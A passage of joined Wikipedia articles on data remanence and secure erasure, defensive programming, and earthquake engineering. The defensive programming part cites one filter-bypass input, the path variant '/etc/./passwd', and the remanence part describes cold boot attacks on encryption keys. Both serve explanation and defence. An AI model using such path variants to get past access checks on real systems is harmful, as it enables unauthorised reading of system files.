hard drive amount to "urban legend".[6]He also points to the "18+1⁄2-minute gap"Rose Mary Woodscreated on a tape ofRichard Nixondiscussing theWatergate break-in. Erased information in the gap has not been recovered, and Feenberg claims doing so would be an easy task compared to recovery of a modern high density digital signal. As of November 2007, theUnited States Department of Defenseconsiders overwriting acceptable for clearing magnetic media within the same security area/zone, but not as a sanitization method. Onlydegaussingorphysical destructionis acceptable for the latter.[7] On the other hand, according to the 2014NISTSpecial Publication 800-88 Rev. 1 (p. 7): "For storage devices containingmagneticmedia, a single overwrite pass with a fixed pattern such as binary zeros typically hinders recovery of data even if state of the art laboratory techniques are applied to attempt to retrieve the data."[8]An analysis by Wright et al. of recovery techniques, including magnetic force microscopy, also concludes that a single wipe is all that is required for modern drives. They point out that the long time required for multiple wipes "has created a situation where many organizations ignore the issue [altogether] – resulting in data leaks and loss."[9] Degaussingis the removal or reduction of a magnetic field of a disk or drive, using a device called a degausser that has been designed for the media being erased. Applied tomagnetic media, degaussing may purge an entire media element quickly and effectively. Degaussing often rendershard disksinoperable, as it erases low-levelformattingthat is only done at the factory during manufacturing. In some cases, it is possible to return the drive to a functional state by having it serviced at the manufacturer. However, some modern degaussers use such a strong magnetic pulse that the motor that spins the platters may be destroyed in the degaussing process, and servicing may not be cost-effective. Degaussed computer tape such asDLTcan generally be reformatted and reused with standard consumer hardware. In some high-security environments, one may be required to use a degausser that has been approved for the task. For example, inUSgovernment and military jurisdictions, one may be required to use a degausser from theNSA's "Evaluated Products List".[10] Encryptingdata before it is stored on the media may mitigate concerns about data remanence. If thedecryption keyis strong and carefully controlled, it may effectively make any data on the media unrecoverable. Even if the key is stored on the media, it may prove easier or quicker tooverwritejust the key, versus the entire disk. This process is calledcrypto-shredding. Encryption may be done on afile-by-filebasis, or on thewhole disk.Cold boot attacksare one of the few possible methods for subverting afull-disk encryptionmethod, as there is no possibility of storing the plain text key in an unencrypted section of the medium. See the sectionComplications: Data in RAMfor further discussion. Otherside-channel attacks(such askeyloggers, acquisition of a written note containing the decryption key, orrubber-hose cryptanalysis) may offer a greater chance of success, but do not rely on weaknesses in the cryptographic method employed. As such, their relevance for this article is minor. Thorough destruction of the underlying storage media is the most certain way to counter data remanence. However, the process is generally time-consuming, cumbersome, and may require extremely thorough methods, as even a small fragment of the media may contain large amounts of data. Specific destruction techniques include: Storage media may have areas which become inaccessible by normal means. For example,magnetic disksmay develop newbad sectorsafter data has been written, and tapes require inter-record gaps. Modernhard disksoften feature reallocation of marginal sectors or tracks, automated in a way that theoperating systemwould not need to work with it. The problem is especially significant insolid-state drives(SSDs) that rely on relatively large relocated bad block tables. Attempts to counter data remanence byoverwritingmay not be successful in such situations, as data remnants may persist in such nominally inaccessible areas. Data storage systems with more sophisticated features may makeoverwriteineffective, especially on a per-file basis. For example,journaling file systemsincrease the integrity of data by recording write operations in multiple locations, and applyingtransaction-like semantics; on such systems, data remnants may exist in locations "outside" the nominal file storage location. Some file systems also implementcopy-on-writeor built-inrevision control, with the intent that writing to a file never overwrites data in-place. Furthermore, technologies such asRAIDandanti-fragmentationtechniques may result in file data being written to multiple locations, either by design (forfault tolerance), or as data remnants. Wear levelingcan also defeat data erasure, by relocating blocks between the time when they are originally written and the time when they are overwritten. For this reason, some security protocols tailored to operating systems or other software featuring automatic wear leveling recommend conducting a free-space wipe of a given drive and then copying many small, easily identifiable "junk" files or files containing other nonsensitive data to fill as much of that drive as possible, leaving only the amount of free space necessary for satisfactory operation of system hardware and software. As storage and system demands grow, the "junk data" files can be deleted as necessary to free up space; even if the deletion of "junk data" files is not secure, their initial nonsensitivity reduces to near zero the consequences of recovery of data remanent from them.[citation needed] Asoptical mediaare not magnetic, they are not erased by conventionaldegaussing.Write-onceoptical media (CD-R,DVD-R, etc.) also cannot be purged by overwriting. Rewritable optical media, such asCD-RWandDVD-RW, may be receptive tooverwriting. Methods for successfully sanitizing optical discs includedelaminatingor abrading the metallic data layer, shredding, incinerating, destructive electrical arcing (as by exposure to microwave energy), and submersion in a polycarbonate solvent (e.g.,acetone). Research from the Center for Magnetic Recording and Research, University of California, San Diego has uncovered problems inherent in erasing data stored onsolid-state drives(SSDs). Researchers discovered three problems with file storage on SSDs:[11] First, built-in commands are effective, but manufacturers sometimes implement them incorrectly. Second, overwriting the entire visible address space of an SSD twice is usually, but not always, sufficient to sanitize the drive. Third, none of the existing hard drive-oriented techniques for individual file sanitization are effective on SSDs.[11]: 1 Solid-state drives, which are flash-based, differ from hard-disk drives in two ways: first, in the way data is stored; and second, in the way the algorithms are used to manage and access that data. These differences can be exploited to recover previously erased data. SSDs maintain a layer of indirection between the logical addresses used by computer systems to access data and the internal addresses that identify physical storage. This layer of indirection hides idiosyncratic media interfaces and enhances SSD performance, reliability, and lifespan (seewear leveling), but it can also produce copies of the data that are invisible to the user and that a sophisticated attacker could recover. For sanitizing entire disks, sanitize commands built into the SSD hardware have been found to be effective when implemented correctly, and software-only techniques for sanitizing entire disks have been found to work most, but not all, of the time.[11]: section 5In testing, none of the software techniques were effective for sanitizing individual files. These included well-known algorithms such as theGutmann method,US DoD 5220.22-M, RCMP TSSIT OPS-II, Schneier 7 Pass, and Secure Empty Trash on macOS (a feature included in versions OS X 10.3-10.9).[11]: section 5 TheTRIMfeature in many SSD devices, if properly implemented, will eventually erase data after it is deleted,[12][citation needed]but the process can take some time, typically several minutes. Many older operating systems do not support this feature, and not all combinations of drives and operating systems work.[13] Data remanence has been observed instatic random-access memory(SRAM), which is typically considered volatile (i.e., the contents degrade with loss of external power). In one study,data retentionwas observed even at room temperature.[14] Data remanence has also been observed indynamic random-access memory(DRAM). Modern DRAM chips have a built-in self-refresh module, as they not only require a power supply to retain data, but must also be periodically refreshed to prevent their data contents from fading away from the capacitors in their integrated circuits. A study found data remanence in DRAM with data retention of seconds to minutes at room temperature and "a full week without refresh when cooled with liquid nitrogen."[15]The study authors were able to use acold boot attackto recover cryptographickeysfor several popularfull disk encryptionsystems, including MicrosoftBitLocker, AppleFileVault,dm-cryptfor Linux, andTrueCrypt.[15]: 12 Despite some memory degradation, authors of the above described study were able to take advantage of redundancy in the way keys are stored after they have been expanded for efficient use, such as inkey scheduling. The authors recommend that computers be powered down, rather than be left in a "sleep" state, when not in physical control of the owner. In some cases, such as certain modes of the software program BitLocker, the authors recommend that a boot password or a key on a removable USB device be used.[15]: 12TRESORis akernelpatchfor Linux specifically intended to preventcold boot attackson RAM by ensuring that encryption keys are not accessible from user space and are stored in the CPU rather than system RAM whenever possible. Newer versions of the disk encryption softwareVeraCryptcan encrypt in-RAM keys and passwords on 64-bit Windows.[16]
https://en.wikipedia.org/wiki/Data_remanence
Defensive programmingis a form ofdefensive designintended to develop programs that are capable of detecting potential security abnormalities and make predetermined responses.[1]It ensures the continuing function of a piece ofsoftwareunder unforeseen circumstances. Defensive programming practices are often used wherehigh availability,safety, orsecurityis needed. Defensive programming is an approach to improve software andsource code, in terms of: Overly defensive programming, however, may safeguard against errors that will never be encountered, thus incurring run-time and maintenance costs. Secure programming is the subset of defensive programming concerned withcomputer security. Security is the concern, not necessarily safety or availability (thesoftwaremay be allowed to fail in certain ways). As with all kinds of defensive programming, avoiding bugs is a primary objective; however, the motivation is not as much to reduce the likelihood of failure in normal operation (as if safety were the concern), but to reduce the attack surface – the programmer must assume that the software might be misused actively to reveal bugs, and that bugs could be exploited maliciously. The function will result in undefined behavior when the input is over 1000 characters. Some programmers may not feel that this is a problem, supposing that no user will enter such a long input. This particular bug demonstrates a vulnerability which enablesbuffer overflowexploits. Here is a solution to this example: Offensive programming is a category of defensive programming, with the added emphasis that certain errors shouldnotbehandled defensively. In this practice, only errors from outside the program's control are to be handled (such as user input); the software itself, as well as data from within the program's line of defense, are to be trusted in thismethodology. Here are some defensive programming techniques: If existing code is tested and known to work, reusing it may reduce the chance of bugs being introduced. However, reusing code is notalwaysgood practice. Reuse of existing code, especially when widely distributed, can allow for exploits to be created that target a wider audience than would otherwise be possible and brings with it all the security and vulnerabilities of the reused code. When considering using existing source code, a quick review of the modules(sub-sections such as classes or functions) will help eliminate or make the developer aware of any potential vulnerabilities and ensure it is suitable to use in the project.[citation needed] Before reusing old source code, libraries, APIs, configurations and so forth, it must be considered if the old work is valid for reuse, or if it is likely to be prone tolegacyproblems. Legacy problems are problems inherent when old designs are expected to work with today's requirements, especially when the old designs were not developed or tested with those requirements in mind. Many software products have experienced problems with old legacy source code; for example: Notable examples of the legacy problem: Malicious users are likely to invent new kinds of representations of incorrect data. For example, if a program attempts to reject accessing the file "/etc/passwd", a cracker might pass another variant of this file name, like "/etc/./passwd".Canonicalizationlibraries can be employed to avoid bugs due to non-canonicalinput. Assume that code constructs that appear to be problem prone (similar to known vulnerabilities, etc.) are bugs and potential security flaws. The basic rule of thumb is: "I'm not aware of all types ofsecurity exploits. I must protect against those Idoknow of and then I must be proactive!". These three rules about data security describe how to handle any data, internally or externally sourced: All data is important until proven otherwise- means that all data must be verified as garbage before being destroyed. All data is tainted until proven otherwise- means that all data must be handled in a way that does not expose the rest of the runtime environment without verifying integrity. All code is insecure until proven otherwise- while a slight misnomer, does a good job reminding us to never assume our code is secure as bugs orundefined behaviormay expose the project or system to attacks such as commonSQL injectionattacks.
https://en.wikipedia.org/wiki/Defensive_programming
Earthquake engineeringis aninterdisciplinarybranch of engineering that designs and analyzesstructures, such asbuildingsandbridges, withearthquakesin mind. Its overall goal is to make such structures more resistant to earthquakes. An earthquake (or seismic) engineer aims to construct structures that will not be damaged in minor shaking and will avoid serious damage orcollapsein a major earthquake. Aproperly engineered structuredoes not necessarily have to be extremely strong or expensive. It has to be properly designed to withstand the seismic effects while sustaining an acceptable level of damage. Earthquake engineering is a scientific field concerned with protecting society, the natural environment, and the man-made environment from earthquakes by limiting theseismic risktosocio-economicallyacceptable levels.[1]Traditionally, it has been narrowly defined as the study of the behavior of structures and geo-structures subject toseismic loading; it is considered as a subset ofstructural engineering,geotechnical engineering,mechanical engineering,chemical engineering,applied physics, etc. However, the tremendous costs experienced in recent earthquakes have led to an expansion of its scope to encompass disciplines from the wider field ofcivil engineering,mechanical engineering,nuclear engineering, and from thesocial sciences, especiallysociology,political science,economics, andfinance.[2][3] The main objectives of earthquake engineering are: Seismic loadingmeans application of an earthquake-generated excitation on a structure (or geo-structure). It happens at contact surfaces of a structure either with the ground,[6]with adjacent structures,[7]or withgravity wavesfromtsunami. The loading that is expected at a given location on the Earth's surface is estimated by engineeringseismology. It is related to theseismic hazardof the location. Earthquakeorseismic performancedefines a structure's ability to sustain its main functions, such as itssafetyandserviceability,atandaftera particular earthquake exposure. A structure is normally consideredsafeif it does not endanger the lives andwell-beingof those in or around it by partially or completely collapsing. A structure may be consideredserviceableif it is able to fulfill its operational functions for which it was designed. Basic concepts of the earthquake engineering, implemented in the major building codes, assume that a building should survive a rare, very severe earthquake by sustaining significant damage but without globally collapsing.[8]On the other hand, it should remain operational for more frequent, but less severe seismic events. Engineers need to know the quantified level of the actual or anticipated seismic performance associated with the direct damage to an individual building subject to a specified ground shaking. Such an assessment may be performed either experimentally or analytically.[citation needed] Experimental evaluations are expensive tests that are typically done by placing a (scaled) model of the structure on ashake-tablethat simulates the earth shaking and observing its behavior.[9]Such kinds of experiments were first performed more than a century ago.[10]Only recently has it become possible to perform 1:1 scale testing on full structures. Due to the costly nature of such tests, they tend to be used mainly for understanding the seismic behavior of structures, validating models and verifying analysis methods. Thus, once properly validated, computational models and numerical procedures tend to carry the major burden for the seismic performance assessment of structures. Seismic performance assessmentorseismic structural analysisis a powerful tool of earthquake engineering which utilizes detailed modelling of the structure together with methods of structural analysis to gain a better understanding of seismic performance of building andnon-building structures. The technique as a formal concept is a relatively recent development. In general, seismic structural analysis is based on the methods ofstructural dynamics.[11]For decades, the most prominent instrument of seismic analysis has been the earthquakeresponse spectrummethod which also contributed to the proposed building code's concept of today.[12] However, such methods are good only for linear elastic systems, being largely unable to model the structural behavior when damage (i.e.,non-linearity) appears. Numericalstep-by-step integrationproved to be a more effective method of analysis for multi-degree-of-freedomstructural systemswith significantnon-linearityunder atransientprocess ofground motionexcitation.[13]Use of thefinite element methodis one of the most common approaches for analyzing non-linearsoil structure interactioncomputer models. Basically, numerical analysis is conducted in order to evaluate the seismic performance of buildings. Performance evaluations are generally carried out by using nonlinear static pushover analysis or nonlinear time-history analysis. In such analyses, it is essential to achieve accurate non-linear modeling of structural components such as beams, columns, beam-column joints, shear walls etc. Thus, experimental results play an important role in determining the modeling parameters of individual components, especially those that are subject to significant non-linear deformations. The individual components are then assembled to create a full non-linear model of the structure. Thus created models are analyzed to evaluate the performance of buildings.[citation needed] The capabilities of the structural analysis software are a major consideration in the above process as they restrict the possible component models, the analysis methods available and, most importantly, the numerical robustness. The latter becomes a major consideration for structures that venture into the non-linear range and approach global or local collapse as the numerical solution becomes increasingly unstable and thus difficult to reach. There are several commercially available Finite Element Analysis software's such as CSI-SAP2000 and CSI-PERFORM-3D, MTR/SASSI, Scia Engineer-ECtools,ABAQUS, andAnsys, all of which can be used for the seismic performance evaluation of buildings. Moreover, there is research-based finite element analysis platforms such asOpenSees, MASTODON, which is based on theMOOSE Framework, RUAUMOKO and the older DRAIN-2D/3D, several of which are now open source.[citation needed] Research for earthquake engineering means both field and analytical investigation or experimentation intended for discovery and scientific explanation of earthquake engineering related facts, revision of conventional concepts in the light of new findings, and practical application of the developed theories. TheNational Science Foundation(NSF) is the main United States government agency that supports fundamental research and education in all fields of earthquake engineering. In particular, it focuses on experimental, analytical and computational research on design and performance enhancement of structural systems. TheEarthquake Engineering Research Institute(EERI) is a leader in dissemination ofearthquake engineering researchrelated information both in the U.S. and globally. A definitive list of earthquake engineering research relatedshaking tablesaround the world may be found in Experimental Facilities for Earthquake Engineering Simulation Worldwide.[14]The most prominent of them is nowE-DefenseShake Table inJapan.[15] NSF also supports the George E. Brown Jr.Network for Earthquake Engineering Simulation The NSF Hazard Mitigation and Structural Engineering program (HMSE) supports research on new technologies for improving the behaviour and response of structural systems subject to earthquake hazards; fundamental research on safety and reliability of constructed systems; innovative developments inanalysisand model based simulation of structural behaviour and response including soil-structure interaction; design concepts that improvestructure performanceand flexibility; and application of new control techniques for structural systems.[16] (NEES) that advances knowledge discovery and innovation forearthquakesandtsunamiloss reduction of the nation's civil infrastructure and new experimental simulation techniques and instrumentation.[17] The NEES network features 14 geographically distributed, shared-use laboratories that support several types of experimental work:[17]geotechnical centrifuge research,shake-tabletests, large-scale structural testing, tsunami wave basin experiments, and field site research.[18]Participating universities include:Cornell University;Lehigh University;Oregon State University;Rensselaer Polytechnic Institute;University at Buffalo,State University of New York;University of California, Berkeley;University of California, Davis;University of California, Los Angeles;University of California, San Diego;University of California, Santa Barbara;University of Illinois, Urbana-Champaign;University of Minnesota;University of Nevada, Reno; and theUniversity of Texas, Austin.[17] The equipment sites (labs) and a central data repository are connected to the global earthquake engineering community via the NEEShub website. The NEES website is powered by HUBzero software developed atPurdue UniversityfornanoHUBspecifically to help the scientific community share resources and collaborate. The cyberinfrastructure, connected viaInternet2, provides interactive simulation tools, a simulation tool development area, a curated central data repository, animated presentations, user support, telepresence, mechanism for uploading and sharing resources, and statistics about users and usage patterns. This cyberinfrastructure allows researchers to: securely store, organize and share data within a standardized framework in a central location; remotely observe and participate in experiments through the use of synchronized real-time data and video; collaborate with colleagues to facilitate the planning, performance, analysis, and publication of research experiments; and conduct computational and hybrid simulations that may combine the results of multiple distributed experiments and link physical experiments with computer simulations to enable the investigation of overall system performance. These resources jointly provide the means for collaboration and discovery to improve the seismic design and performance of civil and mechanical infrastructure systems. The very firstearthquake simulationswere performed by statically applying somehorizontal inertia forcesbased onscaledpeak ground accelerationsto a mathematical model of a building.[19]With the further development of computational technologies,staticapproaches began to give way todynamicones. Dynamic experiments on building and non-building structures may be physical, likeshake-table testing, or virtual ones. In both cases, to verify a structure's expected seismic performance, some researchers prefer to deal with so called "real time-histories" though the last cannot be "real" for a hypothetical earthquake specified by either a building code or by some particular research requirements. Therefore, there is a strong incentive to engage an earthquake simulation which is the seismic input that possesses only essential features of a real event. Sometimes earthquake simulation is understood as a re-creation of local effects of a strong earth shaking. Theoretical or experimental evaluation of anticipated seismic performance mostly requires astructure simulationwhich is based on the concept of structural likeness or similarity.Similarityis some degree ofanalogyorresemblancebetween two or more objects. The notion of similarity rests either on exact or approximate repetitions ofpatternsin the compared items. In general, a building model is said to have similarity with the real object if the two sharegeometric similarity,kinematic similarityanddynamic similarity. The most vivid and effective type of similarity is thekinematicone.Kinematic similarityexists when the paths and velocities of moving particles of a model and its prototype are similar. The ultimate level ofkinematic similarityiskinematic equivalencewhen, in the case of earthquake engineering, time-histories of each story lateral displacements of the model and its prototype would be the same. Seismic vibration controlis a set of technical means aimed to mitigate seismic impacts in building andnon-buildingstructures. All seismic vibration control devices may be classified aspassive,activeorhybrid[21]where: When groundseismic wavesreach up and start to penetrate a base of a building, their energy flow density, due to reflections, reduces dramatically: usually, up to 90%. However, the remaining portions of the incident waves during a major earthquake still bear a huge devastating potential. After the seismic waves enter asuperstructure, there are a number of ways to control them in order to soothe their damaging effect and improve the building's seismic performance, for instance: Devices of the last kind, abbreviated correspondingly as TMD for the tuned (passive), as AMD for theactive, and as HMD for thehybrid mass dampers, have been studied and installed inhigh-rise buildings, predominantly in Japan, for a quarter of a century.[24] However, there is quite another approach: partial suppression of the seismic energy flow into thesuperstructureknown as seismic orbase isolation. For this, some pads are inserted into or under all major load-carrying elements in the base of the building which should substantially decouple asuperstructurefrom itssubstructureresting on a shaking ground. The first evidence of earthquake protection by using the principle of base isolation was discovered inPasargadae, a city in ancient Persia, now Iran, and dates back to the 6th century BCE. Below, there are some samples of seismic vibration control technologies of today. Peruis a highlyseismicland; for centuries the dry-stoneconstructionproved to be more earthquake-resistant than using mortar. People ofInca civilizationwere masters of the polished 'dry-stone walls', calledashlar, where blocks of stone were cut to fit together tightly without anymortar. The Incas were among the best stonemasons the world has ever seen[25]and many junctions in their masonry were so perfect that even blades of grass could not fit between the stones. The stones of the dry-stone walls built by the Incas could move slightly and resettle without the walls collapsing, a passivestructural controltechnique employing both the principle of energy dissipation (coulomb damping) and that of suppressingresonantamplifications.[26] Typically thetuned mass dampersare huge concrete blocks mounted inskyscrapersor other structures and move in opposition to theresonance frequencyoscillations of the structures by means of some sort of spring mechanism. TheTaipei 101skyscraper needs to withstandtyphoonwinds and earthquaketremorscommon in this area of Asia/Pacific. For this purpose, a steelpendulumweighing 660 metric tonnes that serves as a tuned mass damper was designed and installed atop the structure. Suspended from the 92nd to the 88th floor, the pendulum sways to decrease resonant amplifications of lateral displacements in the building caused by earthquakes and stronggusts. Ahysteretic damperis intended to provide better and more reliable seismic performance than that of a conventional structure by increasing the dissipation ofseismic inputenergy.[27]There are five major groups of hysteretic dampers used for the purpose, namely: Viscous Dampers have the benefit of being a supplemental damping system. They have an oval hysteretic loop and the damping is velocity dependent. While some minor maintenance is potentially required, viscous dampers generally do not need to be replaced after an earthquake. While more expensive than other damping technologies they can be used for both seismic and wind loads and are the most commonly used hysteretic damper.[28] Friction dampers tend to be available in two major types, linear and rotational and dissipate energy by heat. The damper operates on the principle of acoulomb damper. Depending on the design, friction dampers can experiencestick-slip phenomenonandCold welding. The main disadvantage being that friction surfaces can wear over time and for this reason they are not recommended for dissipating wind loads. When used in seismic applications wear is not a problem and there is no required maintenance. They have a rectangular hysteretic loop and as long as the building is sufficiently elastic they tend to settle back to their original positions after an earthquake. Metallic yielding dampers, as the name implies, yield in order to absorb the earthquake's energy. This type of damper absorbs a large amount of energy however they must be replaced after an earthquake and may prevent the building from settling back to its original position. Viscoelastic dampers are useful in that they can be used for both wind and seismic applications, they are usually limited to small displacements. There is some concern as to the reliability of the technology as some brands have been banned from use in buildings in the United States. Base isolation seeks to prevent the kinetic energy of the earthquake from being transferred into elastic energy in the building. These technologies do so by isolating the structure from the ground, thus enabling them to move somewhat independently. The degree to which the energy is transferred into the structure and how the energy is dissipated will vary depending on the technology used. Lead rubber bearing or LRB is a type ofbase isolationemploying a heavydamping. It was invented byBill Robinson, a New Zealander.[29] Heavy damping mechanism incorporated invibration controltechnologies and, particularly, in base isolation devices, is often considered a valuable source of suppressing vibrations thus enhancing a building's seismic performance. However, for the rather pliant systems such as base isolated structures, with a relatively low bearing stiffness but with a high damping, the so-called "damping force" may turn out the main pushing force at a strong earthquake. The video[30]shows a Lead Rubber Bearing being tested at theUCSDCaltrans-SRMD facility. The bearing is made of rubber with a lead core. It was a uniaxial test in which the bearing was also under a full structure load. Many buildings and bridges, both in New Zealand and elsewhere, are protected with lead dampers and lead and rubber bearings.Te Papa Tongarewa, the national museum of New Zealand, and the New ZealandParliament Buildingshave been fitted with the bearings. Both are inWellingtonwhich sits on anactive fault.[29] Springs-with-damper base isolator installed under a three-story town-house,Santa Monica, California is shown on the photo taken prior to the 1994Northridge earthquakeexposure. It is abase isolationdevice conceptually similar toLead Rubber Bearing. One of two three-story town-houses like this, which was well instrumented for recording of both vertical and horizontalaccelerationson its floors and the ground, has survived a severe shaking during theNorthridge earthquakeand left valuable recorded information for further study. Simple roller bearing is abase isolationdevice which is intended for protection of various building and non-building structures against potentially damaginglateral impactsof strong earthquakes. This metallic bearing support may be adapted, with certain precautions, as a seismic isolator to skyscrapers and buildings on soft ground. Recently, it has been employed under the name ofmetallic roller bearingfor a housing complex (17 stories) inTokyo, Japan.[31] Friction pendulum bearing (FPB) is another name offriction pendulum system(FPS). It is based on three pillars:[32] Snapshot with the link to video clip of ashake-tabletesting of FPB system supporting a rigid building model is presented at the right. Seismic designis based on authorized engineering procedures, principles and criteria meant todesignorretrofitstructures subject to earthquake exposure.[19]Those criteria are only consistent with the contemporary state of the knowledge aboutearthquake engineering structures.[33]Therefore, a building design which exactly follows seismic code regulations does not guarantee safety against collapse or serious damage.[34] The price of poor seismic design may be enormous. Nevertheless, seismic design has always been atrial and errorprocess whether it was based on physical laws or on empirical knowledge of thestructural performanceof different shapes and materials. To practiceseismic design, seismic analysis or seismic evaluation of new and existing civil engineering projects, anengineershould, normally, pass examination onSeismic Principles[35]which, in the State of California, include: To build up complex structural systems,[36]seismic design largely uses the same relatively small number of basic structural elements (to say nothing of vibration control devices) as any non-seismic design project. Normally, according to building codes, structures are designed to "withstand" the largest earthquake of a certain probability that is likely to occur at their location. This means the loss of life should be minimized by preventing collapse of the buildings. Seismic design is carried out by understanding the possiblefailure modesof a structure and providing the structure with appropriatestrength,stiffness,ductility, andconfiguration[37]to ensure those modes cannot occur. Seismic design requirementsdepend on the type of the structure, locality of the project and its authorities which stipulate applicable seismic design codes and criteria.[8]For instance,California Department of Transportation's requirements calledThe Seismic Design Criteria(SDC) and aimed at the design of new bridges in California[38]incorporate an innovative seismic performance-based approach. The most significant feature in the SDC design philosophy is a shift from aforce-based assessmentof seismic demand to adisplacement-based assessmentof demand and capacity. Thus, the newly adopted displacement approach is based on comparing theelastic displacementdemand to theinelastic displacementcapacity of the primary structural components while ensuring a minimum level of inelastic capacity at all potential plastic hinge locations. In addition to the designed structure itself, seismic design requirements may include aground stabilizationunderneath the structure: sometimes, heavily shaken ground breaks up which leads to collapse of the structure sitting upon it.[40]The following topics should be of primary concerns: liquefaction; dynamic lateral earth pressures on retaining walls; seismic slope stability; earthquake-induced settlement.[41] Nuclear facilitiesshould not jeopardise their safety in case of earthquakes or other hostile external events. Therefore, their seismic design is based on criteria far more stringent than those applying to non-nuclear facilities.[42]TheFukushima I nuclear accidentsanddamage to other nuclear facilitiesthat followed the2011 Tōhoku earthquake and tsunamihave, however, drawn attention to ongoing concerns overJapanese nuclear seismic design standardsand caused many other governments tore-evaluate their nuclear programs. Doubt has also been expressed over the seismic evaluation and design of certain other plants, including theFessenheim Nuclear Power Plantin France. Failure modeis the manner by which an earthquake induced failure is observed. It, generally, describes the way the failure occurs. Though costly and time-consuming, learning from each real earthquake failure remains a routine recipe for advancement inseismic designmethods. Below, some typical modes of earthquake-generated failures are presented. The lack ofreinforcementcoupled with poormortarand inadequate roof-to-wall ties can result in substantial damage to anunreinforced masonry building. Severely cracked or leaning walls are some of the most common earthquake damage. Also hazardous is the damage that may occur between the walls and roof or floor diaphragms. Separation between the framing and the walls can jeopardize the vertical support of roof and floor systems. Soft story effect. Absence of adequate stiffness on the ground level caused damage to this structure. A close examination of the image reveals that the rough board siding, once covered by abrick veneer, has been completely dismantled from the studwall. Only therigidityof the floor above combined with the support on the two hidden sides by continuous walls, not penetrated with large doors as on the street sides, is preventing full collapse of the structure. Soil liquefaction. In the cases where the soil consists of loose granular deposited materials with the tendency to develop excessive hydrostatic pore water pressure of sufficient magnitude and compact,liquefactionof those loose saturated deposits may result in non-uniformsettlementsand tilting of structures. This caused major damage to thousands of buildings in Niigata, Japan during the1964 earthquake.[43] Landslide rock fall. Alandslideis a geological phenomenon which includes a wide range of ground movement, includingrock falls. Typically, the action ofgravityis the primary driving force for a landslide to occur though in this case there was another contributing factor which affected the originalslope stability: the landslide required anearthquake triggerbefore being released. Pounding against adjacent building. This is a photograph of the collapsed five-story tower, St. Joseph's Seminary,Los Altos, Californiawhich resulted in one fatality. DuringLoma Prieta earthquake, the tower pounded against the independently vibrating adjacent building behind. A possibility of pounding depends on both buildings' lateral displacements which should be accurately estimated and accounted for. AtNorthridge earthquake, the Kaiser Permanente concrete frame office building had joints completely shattered, revealinginadequate confinement steel, which resulted in the second story collapse. In the transverse direction, composite endshear walls, consisting of twowythesof brick and a layer ofshotcretethat carried the lateral load, peeled apart because ofinadequate through-tiesand failed. Sliding off foundations effectof a relatively rigid residential building structure during1987 Whittier Narrows earthquake. The magnitude 5.9 earthquake pounded the Garvey West Apartment building in Monterey Park, California and shifted itssuperstructureabout 10 inches to the east on its foundation. If a superstructure is not mounted on abase isolationsystem, its shifting on the basement should be prevented. Reinforced concretecolumn burst atNorthridge earthquakedue toinsufficient shear reinforcement modewhich allows main reinforcement tobuckleoutwards. The deck unseated at thehingeand failed in shear. As a result, the La Cienega-Veniceunderpasssection of the 10 Freeway collapsed. Loma Prieta earthquake: side view of reinforced concretesupport-columns failurewhich triggeredthe upper deck collapse onto the lower deckof the two-level Cypress viaduct of Interstate Highway 880, Oakland, CA. Retaining wall failureatLoma Prieta earthquakein Santa Cruz Mountains area: prominent northwest-trending extensional cracks up to 12 cm (4.7 in) wide in the concretespillwayto Austrian Dam, the northabutment. Ground shaking triggeredsoil liquefactionin a subsurface layer ofsand, producing differential lateral and vertical movement in an overlyingcarapaceof unliquefied sand andsilt. Thismode of ground failure, termedlateral spreading, is a principal cause of liquefaction-related earthquake damage.[44] Severely damaged building of Agriculture Development Bank of China after2008 Sichuan earthquake: most of thebeams and pier columns are sheared. Large diagonal cracks in masonry and veneer are due to in-plane loads while abruptsettlementof the right end of the building should be attributed to alandfillwhich may be hazardous even without any earthquake.[45] Twofold tsunami impact:sea waveshydraulicpressureandinundation. Thus,the Indian Ocean earthquakeof December 26, 2004, with theepicenteroff the west coast ofSumatra, Indonesia, triggered a series of devastating tsunamis, killing more than 230,000 people in eleven countries byinundating surrounding coastal communities with huge wavesup to 30 meters (100 feet) high.[47] Earthquake constructionmeans implementation ofseismic designto enable building and non-building structures to live through the anticipated earthquake exposure up to the expectations and in compliance with the applicablebuilding codes. Design and construction are intimately related. To achieve a good workmanship, detailing of the members and their connections should be as simple as possible. As any construction in general, earthquake construction is a process that consists of the building, retrofitting or assembling of infrastructure given the construction materials available.[48] The destabilizing action of an earthquake on constructions may bedirect(seismic motion of the ground) orindirect(earthquake-induced landslides,soil liquefactionand waves of tsunami). A structure might have all the appearances of stability, yet offer nothing but danger when an earthquake occurs.[49]The crucial fact is that, for safety, earthquake-resistant construction techniques are as important asquality controland using correct materials.Earthquake contractorshould beregisteredin the state/province/country of the project location (depending on local regulations),bondedandinsured[citation needed]. To minimize possiblelosses, construction process should be organized with keeping in mind that earthquake may strike any time prior to the end of construction. Eachconstruction projectrequires a qualified team of professionals who understand the basic features of seismic performance of different structures as well asconstruction management. Around thirty percent of the world's population lives or works in earth-made construction.[50]Adobetype ofmud bricksis one of the oldest and most widely used building materials. The use ofadobeis very common in some of the world's most hazard-prone regions, traditionally across Latin America, Africa, Indian subcontinent and other parts of Asia, Middle East and Southern Europe. Adobe buildings are considered very vulnerable at strong quakes.[51]However, multiple ways of seismic strengthening of new and existing adobe buildings are available.[52] Key factors for the improved seismic performance of adobe construction are: Limestoneis very common in architecture, especially in North America and Europe. Many landmarks across the world are made of limestone. Many medieval churches and castles in Europe are made oflimestoneandsandstonemasonry. They are the long-lasting materials but their rather heavy weight is not beneficial for adequate seismic performance. Application of modern technology to seismic retrofitting can enhance the survivability of unreinforced masonry structures. As an example, from 1973 to 1989, theSalt Lake City and County BuildinginUtahwas exhaustively renovated and repaired with an emphasis on preserving historical accuracy in appearance. This was done in concert with a seismic upgrade that placed the weak sandstone structure on base isolation foundation to better protect it from earthquake damage. Timber framingdates back thousands of years, and has been used in many parts of the world during various periods such as ancient Japan, Europe and medieval England in localities where timber was in good supply and building stone and the skills to work it were not. The use oftimber framingin buildings provides their complete skeletal framing which offers some structural benefits as the timber frame, if properly engineered, lends itself to betterseismic survivability.[54] Light-frame structuresusually gain seismic resistance from rigidplywoodshear walls and wood structural paneldiaphragms.[55]Special provisions for seismic load-resisting systems for allengineered woodstructures requires consideration of diaphragm ratios, horizontal and vertical diaphragm shears, andconnector/fastenervalues. In addition, collectors, or drag struts, to distribute shear along a diaphragm length are required. A construction system wheresteel reinforcementis embedded in themortar jointsofmasonryor placed in holes and that are filled withconcreteorgroutis calledreinforced masonry.[56]There are various practices and techniques to reinforce masonry. The most common type is the reinforcedhollow unit masonry. To achieve aductilebehavior in masonry, it is necessary that theshear strengthof the wall is greater than theflexural strength.[57]The 